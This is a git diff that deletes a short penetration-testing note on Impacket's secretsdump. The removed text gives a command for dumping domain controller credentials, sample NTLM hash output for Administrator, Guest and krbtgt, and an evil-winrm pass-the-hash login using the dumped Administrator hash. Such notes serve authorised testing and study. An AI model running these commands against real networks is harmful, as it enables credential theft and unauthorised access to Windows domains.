diff --git a/secretsdump.md b/secretsdump.md deleted file mode 100644 index 11f2038..0000000 --- a/secretsdump.md +++ /dev/null @@ -1,23 +0,0 @@ -# Secretsdump - -Mimikatz for the network! -* Part of Impacket - -## Usage -* IP and domain controller name only. -```sh -secretsdump.py -just-dc -no-pass \$@ -``` - -* Dumped domain credentials are the result. Example: -```sh -Administrator:500:aad3b435b51404eeaad3b435b51404ee:3f3ef89114fb063e3d7fc23c20f65568::: -Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: -krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2179ebfa86eb0e3cbab2bd58f2c946f5::: -``` - -* NTLM hashes of this dump can be used to feed `evil-winrm`. Example from above as Administrator + Hash -```sh -evil-winrm.rb -i 10.10.15.3 -u Administrator -H 3f3ef89114fb063e3d7fc23c20f65568 -``` -